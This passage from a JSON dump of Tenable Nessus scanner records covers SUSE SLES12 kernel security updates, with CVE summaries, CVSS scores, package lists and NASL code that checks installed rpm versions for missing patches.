failed setup. (bnc#1066618)\n\n - CVE-2017-16537: The imon_probe function in drivers/media/rc/imon.c in the Linux kernel allowed local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.\n (bnc#1066573)\n\n - CVE-2017-16536: The cx231xx_usb_probe function in drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel allowed local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.\n (bnc#1066606)\n\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel allowed local users to cause a denial of service (snd_usb_mixer_interrupt use-after-free and system crash) or possibly have unspecified other impact via a crafted USB device. (bnc#1066625)\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-05T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:3210-1) (Dirty COW)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038", "CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15102", "CVE-2017-16525", "CVE-2017-16527", "CVE-2017-16529", "CVE-2017-16531", "CVE-2017-16535", "CVE-2017-16536", "CVE-2017-16537", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16939"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_66-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_66-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-3210-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105020", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3210-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105020);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0038\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-15102\", \"CVE-2017-16525\", \"CVE-2017-16527\", \"CVE-2017-16529\", \"CVE-2017-16531\", \"CVE-2017-16535\", \"CVE-2017-16536\", \"CVE-2017-16537\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16939\");\n script_bugtraq_id(65255);\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:3210-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP1 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages. (bnc#1069702)\n\n - CVE-2017-1000405: mm, thp: do not dirty huge pages on\n read fault (bnc#1069496).\n\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel allowed\n local users to cause a denial of service (divide-by-zero\n error and system crash) or possibly have unspecified\n other impact via a crafted USB device. (bnc#1067085)\n\n - CVE-2014-0038: The compat_sys_recvmmsg function in\n net/compat.c, when CONFIG_X86_X32 is enabled, allowed\n local users to gain privileges via a recvmmsg system\n call with a crafted timeout pointer parameter\n (bnc#860993).\n\n - CVE-2017-16650: The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel allowed\n local users to cause a denial of service (divide-by-zero\n error and system crash) or possibly have unspecified\n other impact via a crafted USB device. (bnc#1067086)\n\n - CVE-2017-16535: The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds\n read and system crash) or possibly have unspecified\n other impact via a crafted USB device. (bnc#1066700)\n\n - CVE-2017-15102: The tower_probe function in\n drivers/usb/misc/legousbtower.c in the Linux kernel\n allowed local users (who are physically proximate for\n inserting a crafted USB device) to gain privileges by\n leveraging a write-what-where condition that occurs\n after a race condition and a NULL pointer dereference.\n (bnc#1066705)\n\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux\n kernel allowed local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION descriptor.\n (bnc#1066671)\n\n - CVE-2017-12193: The\n assoc_array_insert_into_terminal_node function in\n lib/assoc_array.c in the Linux kernel mishandled node\n splitting, which allowed local users to cause a denial\n of service (NULL pointer dereference and panic) via a\n crafted application, as demonstrated by the keyring key\n type, and key addition and link creation operations.\n (bnc#1066192)\n\n - CVE-2017-16529: The snd_usb_create_streams function in\n sound/usb/card.c in the Linux kernel allowed local users\n to cause a denial of service (out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device. (bnc#1066650)\n\n - CVE-2017-16525: The usb_serial_console_disconnect\n function in drivers/usb/serial/console.c in the Linux\n kernel allowed local users to cause a denial of service\n (use-after-free and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to disconnection and failed setup. (bnc#1066618)\n\n - CVE-2017-16537: The imon_probe function in\n drivers/media/rc/imon.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer\n dereference and system crash) or possibly have\n unspecified other impact via a crafted USB device.\n (bnc#1066573)\n\n - CVE-2017-16536: The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel allowed local users to cause a denial of service\n (NULL pointer dereference and system crash) or possibly\n have unspecified other impact via a crafted USB device.\n (bnc#1066606)\n\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel\n allowed local users to cause a denial of service\n (snd_usb_mixer_interrupt use-after-free and system\n crash) or possibly have unspecified other impact via a\n crafted USB device. (bnc#1066625)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047626\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=860993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975788\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-0038/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12193/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15102/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16525/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16527/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16529/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16531/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16535/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16536/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16537/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16649/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16650/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173210-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?928d702a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1995=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1995=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1995=1\n\nSUSE Linux Enterprise Module for Public Cloud 12:zypper in -t patch\nSUSE-SLE-Module-Public-Cloud-12-2017-1995=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_66-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_66-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/05\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_66-default-1-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_66-xen-1-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.74-60.64.66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.74-60.64.66.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:35:53", "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.61 to receive various security and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-16939: The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages (bnc#1069702 1069708).\n\n - CVE-2017-1000405: The Linux Kernel had a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() could be reached by get_user_pages(). In such case, the pmd would become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd could become dirty without going through a COW cycle. This bug was not as severe as the original 'Dirty cow' because an ext4 file (or any other regular file) could not be mapped using THP. Nevertheless, it did allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files could be overwritten (since their mapping could be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp (bnc#1069496 1070307).\n\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel allowed local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device (bnc#1067085).\n\n - CVE-2014-0038: The compat_sys_recvmmsg function in net/compat.c in the Linux kernel, when CONFIG_X86_X32 is enabled, allowed local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter (bnc#860993).\n\n - CVE-2017-16650: The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel allowed local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device (bnc#1067086).\n\n - CVE-2017-16535: The usb_get_bos_descriptor function in drivers/usb/core/config.c in the Linux kernel allowed local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device (bnc#1066700).\n\n - CVE-2017-15102: The tower_probe function in drivers/usb/misc/legousbtower.c in the Linux kernel allowed local users (who are physically proximate for inserting a crafted USB device) to gain privileges by leveraging a write-what-where condition that occurs after a race condition and a NULL pointer dereference (bnc#1066705).\n\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux kernel allowed local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor (bnc#1066671).\n\n - CVE-2017-12193: The assoc_array_insert_into_terminal_node function in lib/assoc_array.c in the Linux kernel mishandled node splitting, which allowed local users to cause a denial of service (NULL pointer dereference and panic) via a crafted application, as demonstrated by the keyring key type, and key addition and link creation operations (bnc#1066192).\n\n - CVE-2017-16529: The snd_usb_create_streams function in sound/usb/card.c in the Linux kernel allowed local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device (bnc#1066650).\n\n - CVE-2017-16525: The usb_serial_console_disconnect function in drivers/usb/serial/console.c in the Linux kernel allowed local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via a crafted USB device, related to disconnection and failed setup (bnc#1066618).\n\n - CVE-2017-16537: The imon_probe function in drivers/media/rc/imon.c in the Linux kernel allowed local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device (bnc#1066573).\n\n - CVE-2017-16536: The cx231xx_usb_probe function in drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel allowed local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device (bnc#1066606).\n\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel allowed local users to cause a denial of service (snd_usb_mixer_interrupt use-after-free and system crash) or possibly have unspecified other impact via a crafted USB device (bnc#1066625).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-11T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:3249-1) (Dirty COW)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038", "CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15102", "CVE-2017-16525", "CVE-2017-16527", "CVE-2017-16529", "CVE-2017-16531", "CVE-2017-16535", "CVE-2017-16536", "CVE-2017-16537", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16939"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_106-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_106-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-3249-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3249-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105150);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0038\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-15102\", \"CVE-2017-16525\", \"CVE-2017-16527\", \"CVE-2017-16529\", \"CVE-2017-16531\", \"CVE-2017-16535\", \"CVE-2017-16536\", \"CVE-2017-16537\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16939\");\n script_bugtraq_id(65255);\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:3249-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 kernel was updated to 3.12.61 to receive\nvarious security and bugfixes. The following security bugs were \nfixed :\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702 1069708).\n\n - CVE-2017-1000405: The Linux Kernel had a problematic use\n of pmd_mkdirty() in the touch_pmd() function inside the\n THP implementation. touch_pmd() could be reached by\n get_user_pages(). In such case, the pmd would become\n dirty. This scenario breaks the new\n can_follow_write_pmd()'s logic - pmd could become dirty\n without going through a COW cycle. This bug was not as\n severe as the original 'Dirty cow' because an ext4 file\n (or any other regular file) could not be mapped using\n THP. Nevertheless, it did allow us to overwrite\n read-only huge pages. For example, the zero huge page\n and sealed shmem files could be overwritten (since their\n mapping could be populated using THP). Note that after\n the first write page-fault to the zero page, it will be\n replaced with a new fresh (and zeroed) thp (bnc#1069496\n 1070307).\n\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel allowed\n local users to cause a denial of service (divide-by-zero\n error and system crash) or possibly have unspecified\n other impact via a crafted USB device (bnc#1067085).\n\n - CVE-2014-0038: The compat_sys_recvmmsg function in\n net/compat.c in the Linux kernel, when CONFIG_X86_X32 is\n enabled, allowed local users to gain privileges via a\n recvmmsg system call with a crafted timeout pointer\n parameter (bnc#860993).\n\n - CVE-2017-16650: The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel allowed\n local users to cause a denial of service (divide-by-zero\n error and system crash) or possibly have unspecified\n other impact via a crafted USB device (bnc#1067086).\n\n - CVE-2017-16535: The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds\n read and system crash) or possibly have unspecified\n other impact via a crafted USB device (bnc#1066700).\n\n - CVE-2017-15102: The tower_probe function in\n drivers/usb/misc/legousbtower.c in the Linux kernel\n allowed local users (who are physically proximate for\n inserting a crafted USB device) to gain privileges by\n leveraging a write-what-where condition that occurs\n after a race condition and a NULL pointer dereference\n (bnc#1066705).\n\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux\n kernel allowed local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION descriptor\n (bnc#1066671).\n\n - CVE-2017-12193: The\n assoc_array_insert_into_terminal_node function in\n lib/assoc_array.c in the Linux kernel mishandled node\n splitting, which allowed local users to cause a denial\n of service (NULL pointer dereference and panic) via a\n crafted application, as demonstrated by the keyring key\n type, and key addition and link creation operations\n (bnc#1066192).\n\n - CVE-2017-16529: The snd_usb_create_streams function in\n sound/usb/card.c in the Linux kernel allowed local users\n to cause a denial of service (out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device (bnc#1066650).\n\n - CVE-2017-16525: The usb_serial_console_disconnect\n function in drivers/usb/serial/console.c in the Linux\n kernel allowed local users to cause a denial of service\n (use-after-free and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to disconnection and failed setup (bnc#1066618).\n\n - CVE-2017-16537: The imon_probe function in\n drivers/media/rc/imon.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer\n dereference and system crash) or possibly have\n unspecified other impact via a crafted USB device\n (bnc#1066573).\n\n - CVE-2017-16536: The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel allowed local users to cause a denial of service\n (NULL pointer dereference and system crash) or possibly\n have unspecified other impact via a crafted USB device\n (bnc#1066606).\n\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel\n allowed local users to cause a denial of service\n (snd_usb_mixer_interrupt use-after-free and system\n crash) or possibly have unspecified other impact via a\n crafted USB device (bnc#1066625).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043652\"\n );\n script_set_attribute(\n 